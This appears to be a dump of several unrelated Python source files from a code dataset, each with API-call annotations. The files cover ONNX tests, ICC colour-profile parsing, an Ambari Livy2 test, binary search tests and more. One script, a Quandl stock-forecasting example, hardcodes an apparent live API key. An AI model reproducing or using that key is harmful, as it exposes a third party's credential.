elif template_name == '404.html':
return "404 Not Found", "404.html"
else:
raise TemplateDoesNotExist()
| [((492, 514), 'django.template.base.TemplateDoesNotExist', 'TemplateDoesNotExist', ([], {}), '()\n', (512, 514), False, 'from django.template.base import TemplateDoesNotExist\n')] |
davmre/sigvisa | utils/arrival_overlaps.py | 91a1f163b8f3a258dfb78d88a07f2a11da41bd04 | import sigvisa.database.db
from sigvisa.database.dataset import *
import sigvisa.utils.geog
cursor = database.db.connect().cursor()
detections, arid2num = read_detections(cursor, 1237680000, 1237680000 + 168 * 3600, arrival_table="leb_arrival", noarrays=False)
last_det = dict()
overlaps = 0
for det in detections:
site = det[0]
time = det[2]
if site in last_det:
gap = time - last_det[site]
if gap < 5:
print " arrival %d at siteid %d occured %f seconds after previous at %f : phase %s" % (det[1], site, gap, last_det[site], det[DET_PHASE_COL])
overlaps = overlaps + 1
last_det[site] = time
print "total overlaps: ", overlaps, " out of ", len(detections), " detections"
| [] |
mmrahorovic/finn | tests/transformation/streamline/test_move_identical_op_past_join_op.py | d1cc9cf94f1c33354cc169c5a6517314d0e94e3b | import pytest
from onnx import TensorProto
from onnx import helper as oh
import finn.core.onnx_exec as oxe
from finn.core.modelwrapper import ModelWrapper
from finn.transformation.streamline.reorder import MoveTransposePastJoinAdd
from finn.util.basic import gen_finn_dt_tensor
def create_model(perm):
if perm == [0, 3, 1, 2]:
in_shape = [1, 128, 1, 256]
out_shape = [1, 256, 128, 1]
if perm == [0, 2, 3, 1]:
in_shape = [1, 256, 128, 1]
out_shape = [1, 128, 1, 256]
Transpose1_node = oh.make_node(
"Transpose", inputs=["in_transpose1"], outputs=["out_transpose1"], perm=perm
)
Transpose2_node = oh.make_node(
"Transpose", inputs=["in_transpose2"], outputs=["out_transpose2"], perm=perm
)
Join1_node = oh.make_node(
"Add", inputs=["out_transpose1", "out_transpose2"], outputs=["out_join1"]
)
in_transpose1 = oh.make_tensor_value_info(
"in_transpose1", TensorProto.FLOAT, in_shape
)
in_transpose2 = oh.make_tensor_value_info(
"in_transpose2", TensorProto.FLOAT, in_shape
)
out_transpose1 = oh.make_tensor_value_info(
"out_transpose1", TensorProto.FLOAT, out_shape
)
out_transpose2 = oh.make_tensor_value_info(
"out_transpose2", TensorProto.FLOAT, out_shape
)
out_join1 = oh.make_tensor_value_info("out_join1", TensorProto.FLOAT, out_shape)
graph = oh.make_graph(
nodes=[Transpose1_node, Transpose2_node, Join1_node],
name="test_graph",
inputs=[in_transpose1, in_transpose2],
outputs=[out_join1],
value_info=[
out_transpose1,
out_transpose2,
],
)
onnx_model = oh.make_model(graph, producer_name="test_model")
model = ModelWrapper(onnx_model)
return model
# Permutation of transpose node
@pytest.mark.parametrize("perm", [[0, 3, 1, 2], [0, 2, 3, 1]])
def test_move_identical_op_past_join_op(perm):
model = create_model(perm)
# Create input data
input0_tensor_name = model.graph.input[0].name
input1_tensor_name = model.graph.input[1].name
# Note: it is assumed that both tensors have the same shape and data type
input_shape = model.get_tensor_shape(input0_tensor_name)
input_dtype = model.get_tensor_datatype(input0_tensor_name)
input_val = gen_finn_dt_tensor(input_dtype, input_shape)
input_dict = {}
input_dict[input0_tensor_name] = input_val
input_dict[input1_tensor_name] = input_val
model_transformed = model.transform(MoveTransposePastJoinAdd())
assert oxe.compare_execution(model, model_transformed, input_dict)
# Check if order changed
node0_input0_model = model.find_consumers(model.graph.input[0].name)[0].op_type
node1_input1_model = model.find_consumers(model.graph.input[1].name)[0].op_type
node0_input0_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[0].name
)[0].op_type
node1_input1_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[1].name
)[0].op_type
assert node0_input0_model != node0_input0_model_transformed
assert node1_input1_model != node1_input1_model_transformed
| [((1846, 1907), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""perm"""', '[[0, 3, 1, 2], [0, 2, 3, 1]]'], {}), "('perm', [[0, 3, 1, 2], [0, 2, 3, 1]])\n", (1869, 1907), False, 'import pytest\n'), ((533, 628), 'onnx.helper.make_node', 'oh.make_node', (['"""Transpose"""'], {'inputs': "['in_transpose1']", 'outputs': "['out_transpose1']", 'perm': 'perm'}), "('Transpose', inputs=['in_transpose1'], outputs=[\n 'out_transpose1'], perm=perm)\n", (545, 628), True, 'from onnx import helper as oh\n'), ((661, 756), 'onnx.helper.make_node', 'oh.make_node', (['"""Transpose"""'], {'inputs': "['in_transpose2']", 'outputs': "['out_transpose2']", 'perm': 'perm'}), "('Transpose', inputs=['in_transpose2'], outputs=[\n 'out_transpose2'], perm=perm)\n", (673, 756), True, 'from onnx import helper as oh\n'), ((784, 876), 'onnx.helper.make_node', 'oh.make_node', (['"""Add"""'], {'inputs': "['out_transpose1', 'out_transpose2']", 'outputs': "['out_join1']"}), "('Add', inputs=['out_transpose1', 'out_transpose2'], outputs=[\n 'out_join1'])\n", (796, 876), True, 'from onnx import helper as oh\n'), ((907, 978), 'onnx.helper.make_tensor_value_info', 'oh.make_tensor_value_info', (['"""in_transpose1"""', 'TensorProto.FLOAT', 'in_shape'], {}), "('in_transpose1', TensorProto.FLOAT, in_shape)\n", (932, 978), True, 'from onnx import helper as oh\n'), ((1013, 1084), 'onnx.helper.make_tensor_value_info', 'oh.make_tensor_value_info', (['"""in_transpose2"""', 'TensorProto.FLOAT', 'in_shape'], {}), "('in_transpose2', TensorProto.FLOAT, in_shape)\n", (1038, 1084), True, 'from onnx import helper as oh\n'), ((1120, 1193), 'onnx.helper.make_tensor_value_info', 'oh.make_tensor_value_info', (['"""out_transpose1"""', 'TensorProto.FLOAT', 'out_shape'], {}), "('out_transpose1', TensorProto.FLOAT, out_shape)\n", (1145, 1193), True, 'from onnx import helper as oh\n'), ((1229, 1302), 'onnx.helper.make_tensor_value_info', 'oh.make_tensor_value_info', (['"""out_transpose2"""', 'TensorProto.FLOAT', 'out_shape'], {}), "('out_transpose2', TensorProto.FLOAT, out_shape)\n", (1254, 1302), True, 'from onnx import helper as oh\n'), ((1333, 1401), 'onnx.helper.make_tensor_value_info', 'oh.make_tensor_value_info', (['"""out_join1"""', 'TensorProto.FLOAT', 'out_shape'], {}), "('out_join1', TensorProto.FLOAT, out_shape)\n", (1358, 1401), True, 'from onnx import helper as oh\n'), ((1415, 1616), 'onnx.helper.make_graph', 'oh.make_graph', ([], {'nodes': '[Transpose1_node, Transpose2_node, Join1_node]', 'name': '"""test_graph"""', 'inputs': '[in_transpose1, in_transpose2]', 'outputs': '[out_join1]', 'value_info': '[out_transpose1, out_transpose2]'}), "(nodes=[Transpose1_node, Transpose2_node, Join1_node], name=\n 'test_graph', inputs=[in_transpose1, in_transpose2], outputs=[out_join1\n ], value_info=[out_transpose1, out_transpose2])\n", (1428, 1616), True, 'from onnx import helper as oh\n'), ((1707, 1755), 'onnx.helper.make_model', 'oh.make_model', (['graph'], {'producer_name': '"""test_model"""'}), "(graph, producer_name='test_model')\n", (1720, 1755), True, 'from onnx import helper as oh\n'), ((1768, 1792), 'finn.core.modelwrapper.ModelWrapper', 'ModelWrapper', (['onnx_model'], {}), '(onnx_model)\n', (1780, 1792), False, 'from finn.core.modelwrapper import ModelWrapper\n'), ((2333, 2377), 'finn.util.basic.gen_finn_dt_tensor', 'gen_finn_dt_tensor', (['input_dtype', 'input_shape'], {}), '(input_dtype, input_shape)\n', (2351, 2377), False, 'from finn.util.basic import gen_finn_dt_tensor\n'), ((2573, 2632), 'finn.core.onnx_exec.compare_execution', 'oxe.compare_execution', (['model', 'model_transformed', 'input_dict'], {}), '(model, model_transformed, input_dict)\n', (2594, 2632), True, 'import finn.core.onnx_exec as oxe\n'), ((2533, 2559), 'finn.transformation.streamline.reorder.MoveTransposePastJoinAdd', 'MoveTransposePastJoinAdd', ([], {}), '()\n', (2557, 2559), False, 'from finn.transformation.streamline.reorder import MoveTransposePastJoinAdd\n')] |
jchrisfarris/antiope-scorecards | app/lib/ncr_util.py | 82a1e228f4bd23f756c1dec8c0582fcde98de564 | import json
from lib import authz
from lib.logger import logger
from lib.exclusions import exclusions, state_machine
def get_allowed_actions(user, account_id, requirement, exclusion):
allowed_actions = {
'remediate': False,
'requestExclusion': False,
'requestExclusionChange': False,
}
current_state = exclusions.get_state(exclusion)
valid_state_transitions = state_machine.USER_STATE_TRANSITIONS.get(current_state, {}).keys()
logger.debug('Current state: %s', current_state)
logger.debug('Valid state transitions: %s', str(valid_state_transitions))
logger.debug('User: %s', json.dumps(user))
if authz.can_request_exclusion(user, account_id)[0]:
if set(valid_state_transitions) & set(exclusions.REQUEST_EXCLUSION_STATES):
allowed_actions['requestExclusion'] = True
if set(valid_state_transitions) & set(exclusions.REQUEST_EXCLUSION_CHANGE_STATES):
allowed_actions['requestExclusionChange'] = True
# Determine If can remediate
if can_requirement_be_remediated(requirement):
allowed_actions['remediate'] = authz.can_remediate(user, account_id)[0]
return allowed_actions
def can_requirement_be_remediated(requirement):
"""
Mehtod to validate whether a requirement is capable of being remediated.
:param requirement: The dict representing the requirement to check.
:returns bool: A boolean representing whether requirement can or cannot be remediated.
"""
return 'remediation' in requirement
| [((341, 372), 'lib.exclusions.exclusions.get_state', 'exclusions.get_state', (['exclusion'], {}), '(exclusion)\n', (361, 372), False, 'from lib.exclusions import exclusions, state_machine\n'), ((474, 522), 'lib.logger.logger.debug', 'logger.debug', (['"""Current state: %s"""', 'current_state'], {}), "('Current state: %s', current_state)\n", (486, 522), False, 'from lib.logger import logger\n'), ((630, 646), 'json.dumps', 'json.dumps', (['user'], {}), '(user)\n', (640, 646), False, 'import json\n'), ((656, 701), 'lib.authz.can_request_exclusion', 'authz.can_request_exclusion', (['user', 'account_id'], {}), '(user, account_id)\n', (683, 701), False, 'from lib import authz\n'), ((403, 462), 'lib.exclusions.state_machine.USER_STATE_TRANSITIONS.get', 'state_machine.USER_STATE_TRANSITIONS.get', (['current_state', '{}'], {}), '(current_state, {})\n', (443, 462), False, 'from lib.exclusions import exclusions, state_machine\n'), ((1121, 1158), 'lib.authz.can_remediate', 'authz.can_remediate', (['user', 'account_id'], {}), '(user, account_id)\n', (1140, 1158), False, 'from lib import authz\n')] |
Syndra/Ambari-source | ambari-server/src/test/python/stacks/2.6/SPARK2/test_spark_livy2.py | 717526b2bf3636622212b14de0d3d298a20c7370 | #!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
from mock.mock import MagicMock, patch
from stacks.utils.RMFTestCase import *
from only_for_platform import not_for_platform, PLATFORM_WINDOWS
@not_for_platform(PLATFORM_WINDOWS)
@patch("resource_management.libraries.functions.get_stack_version", new=MagicMock(return_value="2.5.0.0-1597"))
class TestSparkClient(RMFTestCase):
COMMON_SERVICES_PACKAGE_DIR = "SPARK2/2.0.0/package"
STACK_VERSION = "2.6"
DEFAULT_IMMUTABLE_PATHS = ['/apps/hive/warehouse', '/apps/falcon', '/mr-history/done', '/app-logs', '/tmp']
def test_configure_default(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/livy2_server.py",
classname = "LivyServer",
command = "start",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_start_default()
self.assertNoMoreResources()
def assert_start_default(self):
self.assertResourceCalled('Directory', '/var/run/livy2',
owner = 'livy',
group = 'hadoop',
create_parents = True,
mode = 0775
)
self.assertResourceCalled('Directory', '/var/log/livy2',
owner = 'livy',
group = 'hadoop',
create_parents = True,
mode = 0775
)
self.assertResourceCalled('HdfsResource', '/user/livy',
immutable_paths = self.DEFAULT_IMMUTABLE_PATHS,
security_enabled = False,
hadoop_bin_dir = '/usr/hdp/2.5.0.0-1235/hadoop/bin',
keytab = UnknownConfigurationMock(),
default_fs = 'hdfs://c6401.ambari.apache.org:8020',
hdfs_site = {u'a': u'b'},
kinit_path_local = '/usr/bin/kinit',
principal_name = UnknownConfigurationMock(),
user = 'hdfs',
owner = 'livy',
hadoop_conf_dir = '/usr/hdp/2.5.0.0-1235/hadoop/conf',
type = 'directory',
action = ['create_on_execute'], hdfs_resource_ignore_file='/var/lib/ambari-agent/data/.hdfs_resource_ignore',
dfs_type = '',
mode = 0775,
)
self.assertResourceCalled('HdfsResource', None,
immutable_paths = self.DEFAULT_IMMUTABLE_PATHS,
security_enabled = False,
hadoop_bin_dir = '/usr/hdp/2.5.0.0-1235/hadoop/bin',
keytab = UnknownConfigurationMock(),
default_fs = 'hdfs://c6401.ambari.apache.org:8020',
hdfs_site = {u'a': u'b'},
kinit_path_local = '/usr/bin/kinit',
principal_name = UnknownConfigurationMock(),
user = 'hdfs',
action = ['execute'], hdfs_resource_ignore_file='/var/lib/ambari-agent/data/.hdfs_resource_ignore',
dfs_type = '',
hadoop_conf_dir = '/usr/hdp/2.5.0.0-1235/hadoop/conf',
)
self.assertResourceCalled('HdfsResource', '/livy2-recovery',
immutable_paths = self.DEFAULT_IMMUTABLE_PATHS,
security_enabled = False,
hadoop_bin_dir = '/usr/hdp/2.5.0.0-1235/hadoop/bin',
keytab = UnknownConfigurationMock(),
default_fs = 'hdfs://c6401.ambari.apache.org:8020',
hdfs_site = {u'a': u'b'},
kinit_path_local = '/usr/bin/kinit',
principal_name = UnknownConfigurationMock(),
user = 'hdfs',
owner = 'livy',
hadoop_conf_dir = '/usr/hdp/2.5.0.0-1235/hadoop/conf',
type = 'directory',
action = ['create_on_execute'], hdfs_resource_ignore_file='/var/lib/ambari-agent/data/.hdfs_resource_ignore',
dfs_type = '',
mode = 0700,
)
self.assertResourceCalled('HdfsResource', None,
immutable_paths = self.DEFAULT_IMMUTABLE_PATHS,
security_enabled = False,
hadoop_bin_dir = '/usr/hdp/2.5.0.0-1235/hadoop/bin',
keytab = UnknownConfigurationMock(),
default_fs = 'hdfs://c6401.ambari.apache.org:8020',
hdfs_site = {u'a': u'b'},
kinit_path_local = '/usr/bin/kinit',
principal_name = UnknownConfigurationMock(),
user = 'hdfs',
action = ['execute'], hdfs_resource_ignore_file='/var/lib/ambari-agent/data/.hdfs_resource_ignore',
dfs_type = '',
hadoop_conf_dir = '/usr/hdp/2.5.0.0-1235/hadoop/conf',
)
self.assertResourceCalled('File', '/usr/hdp/current/livy2-server/conf/livy-env.sh',
content = InlineTemplate(self.getConfig()['configurations']['livy2-env']['content']),
owner = 'livy',
group = 'livy',
mode = 0644,
)
self.assertResourceCalled('PropertiesFile', '/usr/hdp/current/livy2-server/conf/livy.conf',
owner = 'livy',
key_value_delimiter = ' ',
group = 'livy',
properties = self.getConfig()['configurations']['livy2-conf'],
)
self.assertResourceCalled('File', '/usr/hdp/current/livy2-server/conf/log4j.properties',
content = '\n # Set everything to be logged to the console\n log4j.rootCategory=INFO, console\n log4j.appender.console=org.apache.log4j.ConsoleAppender\n log4j.appender.console.target=System.err\n log4j.appender.console.layout=org.apache.log4j.PatternLayout\n log4j.appender.console.layout.ConversionPattern=%d{yy/MM/dd HH:mm:ss} %p %c{1}: %m%n\n\n log4j.logger.org.eclipse.jetty=WARN',
owner = 'livy',
group = 'livy',
mode = 0644,
)
self.assertResourceCalled('File', '/usr/hdp/current/livy2-server/conf/spark-blacklist.conf',
content = self.getConfig()['configurations']['livy2-spark-blacklist']['content'],
owner = 'livy',
group = 'livy',
mode = 0644,
)
self.assertResourceCalled('Directory', '/usr/hdp/current/livy2-server/logs',
owner = 'livy',
group = 'livy',
mode = 0755,
)
self.assertResourceCalled('Execute', '/usr/hdp/current/livy2-server/bin/livy-server start',
environment = {'JAVA_HOME': '/usr/jdk64/jdk1.7.0_45'},
not_if = 'ls /var/run/livy2/livy-livy-server.pid >/dev/null 2>&1 && ps -p `cat /var/run/livy2/livy-livy-server.pid` >/dev/null 2>&1',
user = 'livy'
)
| [] |
harimaruthachalam/SentDexChapters | SentDex/Chapter05.py | b3753ae27b6f965f3611edea9bde2ed5e9478f8f | import quandl
import math
import numpy as np
from sklearn import preprocessing, cross_validation, svm
from sklearn.linear_model import LinearRegression
import pickle
import datetime
from matplotlib import style
import matplotlib.pyplot as plot
# Config
isLoadFromLocal = True
quandl.ApiConfig.api_key = '76eCnz6z9XTH8nfLWeQU'
style.use('ggplot')
# Loading data
if isLoadFromLocal:
df = pickle.load(open("DataFromQuandl_Stock_Chap2.pickle", "rb"))
else:
df = quandl.get('WIKI/GOOGL')
pickle.dump(df, open("DataFromQuandl_Stock_Chap2.pickle", "wb+"))
# Data pre-processing
df['HL_PCT'] = (df['Adj. High'] - df['Adj. Close']) / df['Adj. Close']
df['PCT_Change'] = (df['Adj. Close'] - df['Adj. Open']) / df['Adj. Open']
df = df[['Adj. Close', 'HL_PCT', 'PCT_Change', 'Adj. Volume']]
forecastCol = 'Adj. Close'
df.fillna('-99999', inplace = True)
forecastOut = int(math.ceil(0.01*len(df)))
df['label'] = df[forecastCol].shift(-forecastOut)
# df['label'].plot()
# df[forecastCol].plot()
# plot.legend(loc = 4)
# plot.show()
x = np.array(df.drop(['label'], 1))
print(x)
x = preprocessing.scale(x)
print(x)
xLately = x[-forecastOut:]
x = x[:-forecastOut]
df.dropna(inplace = True)
y = np.array(df['label'])
# Regression
x_train, x_test, y_train, y_test = cross_validation.train_test_split(x, y, test_size=0.1)
# classifier = svm.SVR(kernel='linear') # SVM SVR
classifier = LinearRegression(n_jobs=3) # Linear Regression
classifier.fit(x_train, y_train)
accuracy = classifier.score(x_test, y_test)
forecastSet = classifier.predict(xLately)
print('Accuracy is ', accuracy, '\nForecasted values are ', forecastSet, '\nNumber of values is ', forecastOut)
df['Forecast'] = np.nan
lastDate = df.iloc[-1].name
print(lastDate)
lastTime = lastDate.timestamp()
print(lastTime)
oneDay = 24 * 60 * 60 # seconds in a day
nextTime = lastTime + oneDay
for iter in forecastSet:
nextDate = datetime.datetime.fromtimestamp(nextTime)
nextTime += oneDay
df.loc[nextDate] = [np.nan for _ in range(len(df.columns) - 1)] + [iter]
df['Adj. Close'].plot()
df['Forecast'].plot()
plot.legend(loc = 4)
plot.xlabel('Date')
plot.ylabel('Price')
plot.show() | [((327, 346), 'matplotlib.style.use', 'style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (336, 346), False, 'from matplotlib import style\n'), ((1087, 1109), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['x'], {}), '(x)\n', (1106, 1109), False, 'from sklearn import preprocessing, cross_validation, svm\n'), ((1197, 1218), 'numpy.array', 'np.array', (["df['label']"], {}), "(df['label'])\n", (1205, 1218), True, 'import numpy as np\n'), ((1269, 1323), 'sklearn.cross_validation.train_test_split', 'cross_validation.train_test_split', (['x', 'y'], {'test_size': '(0.1)'}), '(x, y, test_size=0.1)\n', (1302, 1323), False, 'from sklearn import preprocessing, cross_validation, svm\n'), ((1389, 1415), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {'n_jobs': '(3)'}), '(n_jobs=3)\n', (1405, 1415), False, 'from sklearn.linear_model import LinearRegression\n'), ((2085, 2103), 'matplotlib.pyplot.legend', 'plot.legend', ([], {'loc': '(4)'}), '(loc=4)\n', (2096, 2103), True, 'import matplotlib.pyplot as plot\n'), ((2106, 2125), 'matplotlib.pyplot.xlabel', 'plot.xlabel', (['"""Date"""'], {}), "('Date')\n", (2117, 2125), True, 'import matplotlib.pyplot as plot\n'), ((2126, 2146), 'matplotlib.pyplot.ylabel', 'plot.ylabel', (['"""Price"""'], {}), "('Price')\n", (2137, 2146), True, 'import matplotlib.pyplot as plot\n'), ((2147, 2158), 'matplotlib.pyplot.show', 'plot.show', ([], {}), '()\n', (2156, 2158), True, 'import matplotlib.pyplot as plot\n'), ((469, 493), 'quandl.get', 'quandl.get', (['"""WIKI/GOOGL"""'], {}), "('WIKI/GOOGL')\n", (479, 493), False, 'import quandl\n'), ((1896, 1937), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['nextTime'], {}), '(nextTime)\n', (1927, 1937), False, 'import datetime\n')] |
pmay/tifinity | tifinity/actions/icc_parser.py | e004a0e616c7b7455fac6f01ee9acb892cd560c0 | class IccProfile():
"""Parses an ICC Colour Profile.
According to spec: all Profile data shall be encoded as big-endian"""
def __init__(self, bytes):
self.header = {}
self.parse_icc(bytes)
def get_colour_space(self):
"""Returns the data colour space type, or None if not defined"""
return self.header.get('data_colour_space')
def tostring(self, limit_value=False):
out = "\nHEADER\n"
for k, v in self.header.items():
out += " [{0:27}]\t{1:31}\n".format(k, v)
out += "\nTAGS ({0})\n".format(self.tag_count)
for tag, (offset, size, value) in self.tags.items():
if len(value)>100 and limit_value:
out += " [{0}]\t{1}\t{2}\t{3}...\n".format(tag, offset, size, value[:100])
else:
out += " [{0}]\t{1}\t{2}\t{3}\n".format(tag, offset, size, value)
return out
def parse_icc(self, bytes):
"""Parsers the specified bytes representing an ICC Profile"""
# ICC profile consists of:
# - 128-byte profile header
# - profile tag table:
# - profile tagged element data (referenced from tag table)
if bytes is not None:
self.read_header(bytes)
self.read_tags(bytes)
def read_header(self, bytes):
self.header['profile_size'] = IccProfile.read_int(bytes, 0)
self.header['preferred_cmm_type'] = IccProfile.read_string(bytes, 4, 4)
self.header['profile_version_number'] = IccProfile.read_binary_coded_decimal(bytes, 8)
self.header['profile_device_class'] = IccProfile.read_string(bytes, 12, 4)
self.header['data_colour_space'] = IccProfile.read_string(bytes, 16, 4)
self.header['pcs'] = IccProfile.read_string(bytes, 20, 4)
self.header['creation_datetime'] = IccProfile.read_datetime(bytes, 24) # YY-mm-dd HH:mm:ss
self.header['acsp'] = IccProfile.read_string(bytes, 36, 4) # Must = acsp
self.header['primary_platform_sig'] = IccProfile.read_string(bytes, 40, 4) # APPL, MSFT, SGI, SUNW, 0
self.header['profile_flags'] = IccProfile.read_int(bytes, 44) # todo: flags
self.header['device_manufacturer'] = IccProfile.read_string(bytes, 48, 4)
self.header['device_model'] = IccProfile.read_int(bytes, 52)
self.header['device_attributes'] = IccProfile.read_int(bytes, 56) # todo: flags
self.header['rendering_intent'] = IccProfile.read_int(bytes, 64)
self.header['nciexyz_values'] = IccProfile.read_xyznumber(bytes, 68)
self.header['profile_creator_signature'] = IccProfile.read_string(bytes, 80, 4)
self.header['profile_id'] = str(bytes[84:99])
self.header['reserved'] = str(bytes[100:128])
def read_tags(self, bytes):
# 4 bytes tag count
# n x 12 byte tags (4 bytes sig, 4 bytes offset (relative to profile start), 4 bytes size of data element)
self.tag_count = IccProfile.read_int(bytes, 128)
self.tags = {}
for t in range(self.tag_count):
type = IccProfile.read_string(bytes, 132+(t*12), 4)
offset = IccProfile.read_int(bytes, 136+(t*12))
size = IccProfile.read_int(bytes, 140+(t*12))
read_func = tagtypes.get(type)
if read_func is not None:
#read_func = getattr(IccProfile, tag_tuple[0])
value = read_func(bytes, offset, size)
else:
value = bytes[offset: offset+size]
self.tags[type] = (offset, size, value)
@staticmethod
def read_int(bytes, offset, count=1, size=4, byteorder='big'):
return int.from_bytes(bytes[offset:offset+size], byteorder=byteorder)
@staticmethod
def read_string(bytes, offset, count, byteorder='big'):
return ''.join(map(chr, bytes[offset:offset+count]))
@staticmethod
def read_binary_coded_decimal(bytes, start):
out = "{0}.{1}.{2}".format(bytes[start],
bytes[start+1]>>4,
bytes[start+1]&0x0F)
return out
@staticmethod
def read_datetime(bytes, offset, byteorder='big'):
out = "{0}-{1}-{2} {3}:{4}:{5}".format(str(int.from_bytes(bytes[offset:offset + 2], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 2:offset + 4], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 4:offset + 6], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 6:offset + 8], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 8:offset + 10], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 10:offset + 12], byteorder=byteorder)))
return out
@staticmethod
def read_signature_type(bytes, offset, count):
assert (IccProfile.read_string(bytes, offset, 4) == 'sig ')
assert (IccProfile.read_int(bytes, offset + 4) == 0)
return IccProfile.read_string(bytes, offset+8, 4)
@staticmethod
def read_xyztype(bytes, offset, count):
sig = IccProfile.read_string(bytes, offset, 4)
assert(IccProfile.read_int(bytes, offset+4) == 0)
# todo: repeat xyz for remainder of xyztype bytes
xyz = IccProfile.read_xyznumber(bytes, offset+8)
return "{0}: {1}".format(sig, xyz)
@staticmethod
def read_xyznumber(bytes, offset, byteorder='big'):
x_i = IccProfile.read_s15Fixed16Number(bytes, offset)
y_i = IccProfile.read_s15Fixed16Number(bytes, offset+4)
z_i = IccProfile.read_s15Fixed16Number(bytes, offset+8)
return "X={0}, Y={1}, Z={2}".format(x_i, y_i, z_i)
@staticmethod
def read_trctype(bytes, offset, count):
# check first 4 bytes, either 'curv' or 'para'
sig = IccProfile.read_string(bytes, offset, 4)
if sig=='curv':
# next 4 bytes 0
assert (IccProfile.read_int(bytes, offset + 4) == 0)
n = IccProfile.read_int(bytes, offset+8)
vals = [IccProfile.read_int(bytes, offset+12+(2*i), size=2) for i in range(n)]
# todo: para
return "{0} : count {1} : {2}".format(sig, n, vals)
@staticmethod
def read_s15Fixed16Number(bytes, offset):
conv = lambda x: ((x & 0xffff0000) >> 16) + ((x & 0x0000ffff) / 65536)
return conv(int.from_bytes(bytes[offset:offset + 4], byteorder='big'))
@staticmethod
def read_s15Fixed16ArrayType(bytes, offset, count):
assert(IccProfile.read_string(bytes, offset, 4) == 'sf32')
assert(IccProfile.read_int(bytes, offset+4) == 0)
n = int((count-8)/4)
return [IccProfile.read_s15Fixed16Number(bytes, offset+8+(i*4)) for i in range(n)]
tagtypes = {
'chad': (IccProfile.read_s15Fixed16ArrayType),
'cprt': (IccProfile.read_string),
'desc': (IccProfile.read_string),
'dmdd': (IccProfile.read_string),
'tech': (IccProfile.read_signature_type),
'vued': (IccProfile.read_string),
'wtpt': (IccProfile.read_xyztype),
'bkpt': (IccProfile.read_xyztype), # private type?
'rTRC': (IccProfile.read_trctype),
'gTRC': (IccProfile.read_trctype),
'bTRC': (IccProfile.read_trctype),
'rXYZ': (IccProfile.read_xyztype),
'gXYZ': (IccProfile.read_xyztype),
'bXYZ': (IccProfile.read_xyztype),
}
if __name__=='__main__':
import numpy as np
import sys
with open(sys.argv[1], 'rb') as file:
data = np.fromfile(file, dtype="uint8")
profile = IccProfile(data)
print(profile.tostring()) | [((7723, 7755), 'numpy.fromfile', 'np.fromfile', (['file'], {'dtype': '"""uint8"""'}), "(file, dtype='uint8')\n", (7734, 7755), True, 'import numpy as np\n')] |
asakatida/data-structures-and-algorithms.py | challenges/binary_search/test_binary_search.py | 587d1a66a6c15a3c7d7786275608f065687e1810 | from .binary_search import binary_search
def test_binary_search_empty_array():
assert binary_search([], 0) == -1
def test_binary_search_find_single_array():
assert binary_search([3], 3) == 0
def test_binary_search_not_found_single_array():
assert binary_search([1], 0) == -1
def test_binary_search_not_found_in_short_array():
assert binary_search([1, 2, 3], 0) == -1
def test_binary_search_found_at_begining():
assert binary_search([0, 1, 2, 3, 4, 5], 0) == 0
def test_binary_search_found_at_end():
assert binary_search([0, 1, 3, 4, 5], 5) == 4
def test_binary_search_found_at_middle_even():
assert binary_search([0, 1, 3, 5], 3) == 2
def test_binary_search_found_at_middle_odd():
assert binary_search([1, 3, 5], 3) == 1
def test_binary_search_high_value():
assert binary_search([1, 3, 5], 3) == 1
def test_binary_search_large_array_low():
assert binary_search(list(range(0xFFFFFF)), 0xFF) == 0xFF
def test_binary_search_large_array_high():
assert binary_search(list(range(0xFFFFFF)), 0xFFFFF) == 0xFFFFF
def test_binary_search_large_array_not_found():
assert binary_search(list(range(0xFFFFFF)), -4) == -1
| [] |
Cipalex/session3 | Module2.py | fe0866db54d719687f5a89a71ddc17657c91089e | def f():
print('f from module 2')
if __name__ == '__main__':
print('Module 2') | [] |
Subsets and Splits